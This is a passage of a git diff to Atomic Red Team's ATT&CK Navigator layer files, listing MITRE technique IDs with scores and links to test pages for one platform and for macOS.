md"},{"techniqueID":"T1033","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1033/T1033.md"},{"techniqueID":"T1036.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.003/T1036.003.md"},{"techniqueID":"T1036","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.003/T1036.003.md"},{"techniqueID":"T1036.005","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.005/T1036.005.md"},{"techniqueID":"T1036","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.005/T1036.005.md"},{"techniqueID":"T1037.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037.004/T1037.004.md"},{"techniqueID":"T1037","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037.004/T1037.004.md"},{"techniqueID":"T1040","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1040/T1040.md"},{"techniqueID":"T1046","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1046/T1046.md"},{"techniqueID":"T1048.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1048.003/T1048.003.md"},{"techniqueID":"T1048","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1048.003/T1048.003.md"},{"techniqueID":"T1048","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1048/T1048.md"},{"techniqueID":"T1049","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1049/T1049.md"},{"techniqueID":"T1053.001","sc
ore":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.001/T1053.001.md"},{"techniqueID":"T1053","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.001/T1053.001.md"},{"techniqueID":"T1053.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.003/T1053.003.md"},{"techniqueID":"T1053","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.003/T1053.003.md"},{"techniqueID":"T1053.006","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.006/T1053.006.md"},{"techniqueID":"T1053","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.006/T1053.006.md"},{"techniqueID":"T1053.007","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.007/T1053.007.md"},{"techniqueID":"T1053","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.007/T1053.007.md"},{"techniqueID":"T1056.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056.001/T1056.001.md"},{"techniqueID":"T1056","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056.001/T1056.001.md"},{"techniqueID":"T1057","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1057/T1057.md"},{"techniqueID":"T1059.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.004/T1059.004.md"},{"techniqueID":"T1059","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.004/T1059.004.md"},{"techniqueID":"T1059.006
","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.006/T1059.006.md"},{"techniqueID":"T1059","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.006/T1059.006.md"},{"techniqueID":"T1069.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1069.001/T1069.001.md"},{"techniqueID":"T1069","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1069.001/T1069.001.md"},{"techniqueID":"T1070.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.002/T1070.002.md"},{"techniqueID":"T1070","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.002/T1070.002.md"},{"techniqueID":"T1070.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.003/T1070.003.md"},{"techniqueID":"T1070","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.003/T1070.003.md"},{"techniqueID":"T1070.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.004/T1070.004.md"},{"techniqueID":"T1070","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.004/T1070.004.md"},{"techniqueID":"T1070.006","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.006/T1070.006.md"},{"techniqueID":"T1070","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.006/T1070.006.md"},{"techniqueID":"T1071.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1071.001/T1071.001.md"},{"techni
queID":"T1071","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1071.001/T1071.001.md"},{"techniqueID":"T1074.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1074.001/T1074.001.md"},{"techniqueID":"T1074","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1074.001/T1074.001.md"},{"techniqueID":"T1082","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1082/T1082.md"},{"techniqueID":"T1083","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1083/T1083.md"},{"techniqueID":"T1087.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1087.001/T1087.001.md"},{"techniqueID":"T1087","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1087.001/T1087.001.md"},{"techniqueID":"T1090.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1090.001/T1090.001.md"},{"techniqueID":"T1090","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1090.001/T1090.001.md"},{"techniqueID":"T1098.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098.001/T1098.001.md"},{"techniqueID":"T1098","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098.001/T1098.001.md"},{"techniqueID":"T1098.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098.004/T1098.004.md"},{"techniqueID":"T1098","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098.004/T1098.004.md"},{"techniqueID":
"T1098","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098/T1098.md"},{"techniqueID":"T1105","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1105/T1105.md"},{"techniqueID":"T1110.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.001/T1110.001.md"},{"techniqueID":"T1110","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.001/T1110.001.md"},{"techniqueID":"T1110.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.003/T1110.003.md"},{"techniqueID":"T1110","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.003/T1110.003.md"},{"techniqueID":"T1110.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.004/T1110.004.md"},{"techniqueID":"T1110","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.004/T1110.004.md"},{"techniqueID":"T1113","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1113/T1113.md"},{"techniqueID":"T1132.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1132.001/T1132.001.md"},{"techniqueID":"T1132","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1132.001/T1132.001.md"},{"techniqueID":"T1135","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1135/T1135.md"},{"techniqueID":"T1136.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136.001/T1136.001.md"},{"techniqueID":"T1136","score":100,"en
abled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136.001/T1136.001.md"},{"techniqueID":"T1136.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136.003/T1136.003.md"},{"techniqueID":"T1136","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136.003/T1136.003.md"},{"techniqueID":"T1140","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1140/T1140.md"},{"techniqueID":"T1176","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1176/T1176.md"},{"techniqueID":"T1201","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1201/T1201.md"},{"techniqueID":"T1217","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1217/T1217.md"},{"techniqueID":"T1222.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1222.002/T1222.002.md"},{"techniqueID":"T1222","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1222.002/T1222.002.md"},{"techniqueID":"T1485","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1485/T1485.md"},{"techniqueID":"T1486","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1486/T1486.md"},{"techniqueID":"T1496","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1496/T1496.md"},{"techniqueID":"T1497.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1497.001/T1497.001.md"},{"techniqueID":"T1497","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/a
tomic-red-team/blob/master/atomics/T1497.001/T1497.001.md"},{"techniqueID":"T1518.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1518.001/T1518.001.md"},{"techniqueID":"T1518","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1518.001/T1518.001.md"},{"techniqueID":"T1529","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1529/T1529.md"},{"techniqueID":"T1543.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1543.002/T1543.002.md"},{"techniqueID":"T1543","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1543.002/T1543.002.md"},{"techniqueID":"T1546.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.004/T1546.004.md"},{"techniqueID":"T1546","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.004/T1546.004.md"},{"techniqueID":"T1546.005","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.005/T1546.005.md"},{"techniqueID":"T1546","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.005/T1546.005.md"},{"techniqueID":"T1547.006","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.006/T1547.006.md"},{"techniqueID":"T1547","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.006/T1547.006.md"},{"techniqueID":"T1548.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1548.001/T1548.001.md"},{"techniqueID":"T1548","score":100,"enabled":true,"comment":"https://github.com/redcanar
yco/atomic-red-team/blob/master/atomics/T1548.001/T1548.001.md"},{"techniqueID":"T1548.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1548.003/T1548.003.md"},{"techniqueID":"T1548","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1548.003/T1548.003.md"},{"techniqueID":"T1552.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.001/T1552.001.md"},{"techniqueID":"T1552","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.001/T1552.001.md"},{"techniqueID":"T1552.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.003/T1552.003.md"},{"techniqueID":"T1552","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.003/T1552.003.md"},{"techniqueID":"T1552.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.004/T1552.004.md"},{"techniqueID":"T1552","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.004/T1552.004.md"},{"techniqueID":"T1552.007","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.007/T1552.007.md"},{"techniqueID":"T1552","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.007/T1552.007.md"},{"techniqueID":"T1553.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1553.004/T1553.004.md"},{"techniqueID":"T1553","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1553.004/T1553.004.md"},{"techniqueID":"T1560.001","score":100,"enabled":true,"comment":"https://gi
thub.com/redcanaryco/atomic-red-team/blob/master/atomics/T1560.001/T1560.001.md"},{"techniqueID":"T1560","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1560.001/T1560.001.md"},{"techniqueID":"T1560.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1560.002/T1560.002.md"},{"techniqueID":"T1560","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1560.002/T1560.002.md"},{"techniqueID":"T1562.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.001/T1562.001.md"},{"techniqueID":"T1562","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.001/T1562.001.md"},{"techniqueID":"T1562.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.003/T1562.003.md"},{"techniqueID":"T1562","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.003/T1562.003.md"},{"techniqueID":"T1562.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.004/T1562.004.md"},{"techniqueID":"T1562","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.004/T1562.004.md"},{"techniqueID":"T1562.006","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.006/T1562.006.md"},{"techniqueID":"T1562","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.006/T1562.006.md"},{"techniqueID":"T1562.008","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.008/T1562.008.md"},{"techniqueID":"T1562","score":100,"enabled":true,"comment
":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.008/T1562.008.md"},{"techniqueID":"T1564.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.001/T1564.001.md"},{"techniqueID":"T1564","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.001/T1564.001.md"},{"techniqueID":"T1571","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1571/T1571.md"},{"techniqueID":"T1574.006","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.006/T1574.006.md"},{"techniqueID":"T1574","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.006/T1574.006.md"},{"techniqueID":"T1609","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1609/T1609.md"},{"techniqueID":"T1610","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1610/T1610.md"},{"techniqueID":"T1611","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1611/T1611.md"}]} \ No newline at end of file diff --git a/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-macos.json b/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-macos.json index 6f85cc98..cd230671 100644 --- a/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-macos.json +++ b/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-macos.json 
@@ -1 +1 @@ -{"version":"4.1","name":"Atomic Red Team (macOS)","description":"Atomic Red Team (macOS) MITRE ATT&CK Navigator Layer","domain":"mitre-enterprise","gradient":{"colors":["#ce232e","#ce232e"],"minValue":0,"maxValue":100},"legendItems":[{"label":"Has at least one test","color":"#ce232e"}],"techniques":[{"techniqueID":"T1016","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1016/T1016.md"},{"techniqueID":"T1018","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1018/T1018.md"},{"techniqueID":"T1027.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.001/T1027.001.md"},{"techniqueID":"T1027","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.001/T1027.001.md"},{"techniqueID":"T1027.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.002/T1027.002.md"},{"techniqueID":"T1027","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.002/T1027.002.md"},{"techniqueID":"T1027","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027/T1027.md"},{"techniqueID":"T1030","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1030/T1030.md"},{"techniqueID":"T1033","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1033/T1033.md"},{"techniqueID":"T1036.005","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.005/T1036.005.md"},{"techniqueID":"T1036","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.005/T1036.005.md"},{"techniqueID":"T1036.006","sco
re":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.006/T1036.006.md"},{"techniqueID":"T1036","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.006/T1036.006.md"},{"techniqueID":"T1037.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037.002/T1037.002.md"},{"techniqueID":"T1037","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037.002/T1037.002.md"},{"techniqueID":"T1037.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037.004/T1037.004.md"},{"techniqueID":"T1037","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037.004/T1037.004.md"},{"techniqueID":"T1037.005","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037.005/T1037.005.md"},{"techniqueID":"T1037","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037.005/T1037.005.md"},{"techniqueID":"T1040","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1040/T1040.md"},{"techniqueID":"T1046","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1046/T1046.md"},{"techniqueID":"T1048.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1048.003/T1048.003.md"},{"techniqueID":"T1048","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1048.003/T1048.003.md"},{"techniqueID":"T1048","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1048/T1048.md"},{"techniqueID":"T1049","score":100,"enabled":t
rue,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1049/T1049.md"},{"techniqueID":"T1053.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.003/T1053.003.md"},{"techniqueID":"T1053","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.003/T1053.003.md"},{"techniqueID":"T1053.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.004/T1053.004.md"},{"techniqueID":"T1053","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.004/T1053.004.md"},{"techniqueID":"T1056.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056.002/T1056.002.md"},{"techniqueID":"T1056","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056.002/T1056.002.md"},{"techniqueID":"T1057","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1057/T1057.md"},{"techniqueID":"T1059.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.002/T1059.002.md"},{"techniqueID":"T1059","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.002/T1059.002.md"},{"techniqueID":"T1059.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.004/T1059.004.md"},{"techniqueID":"T1059","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.004/T1059.004.md"},{"techniqueID":"T1069.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1069.001/T1069.001.md"},{"techniqueID":"T1069","score":100,"enabled":true
,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1069.001/T1069.001.md"},{"techniqueID":"T1070.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.002/T1070.002.md"},{"techniqueID":"T1070","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.002/T1070.002.md"},{"techniqueID":"T1070.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.003/T1070.003.md"},{"techniqueID":"T1070","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.003/T1070.003.md"},{"techniqueID":"T1070.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.004/T1070.004.md"},{"techniqueID":"T1070","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.004/T1070.004.md"},{"techniqueID":"T1070.006","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.006/T1070.006.md"},{"techniqueID":"T1070","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.006/T1070.006.md"},{"techniqueID":"T1071.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1071.001/T1071.001.md"},{"techniqueID":"T1071","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1071.001/T1071.001.md"},{"techniqueID":"T1074.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1074.001/T1074.001.md"},{"techniqueID":"T1074","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1074.001/T1074.001.md"},{"techniqueID":"T1082","score":100,"
enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1082/T1082.md"},{"techniqueID":"T1083","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1083/T1083.md"},{"techniqueID":"T1087.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1087.001/T1087.001.md"},{"techniqueID":"T1087","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1087.001/T1087.001.md"},{"techniqueID":"T1090.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1090.001/T1090.001.md"},{"techniqueID":"T1090","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1090.001/T1090.001.md"},{"techniqueID":"T1098.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098.004/T1098.004.md"},{"techniqueID":"T1098","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098.004/T1098.004.md"},{"techniqueID":"T1105","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1105/T1105.md"},{"techniqueID":"T1110.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.004/T1110.004.md"},{"techniqueID":"T1110","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.004/T1110.004.md"},{"techniqueID":"T1113","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1113/T1113.md"},{"techniqueID":"T1115","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1115/T1115.md"},{"techniqueID":"T1132.001","score":100,"enabled":true,"comment":"https:
//github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1132.001/T1132.001.md"},{"techniqueID":"T1132","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1132.001/T1132.001.md"},{"techniqueID":"T1135","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1135/T1135.md"},{"techniqueID":"T1136.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136.001/T1136.001.md"},{"techniqueID":"T1136","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136.001/T1136.001.md"},{"techniqueID":"T1140","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1140/T1140.md"},{"techniqueID":"T1176","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1176/T1176.md"},{"techniqueID":"T1201","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1201/T1201.md"},{"techniqueID":"T1217","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1217/T12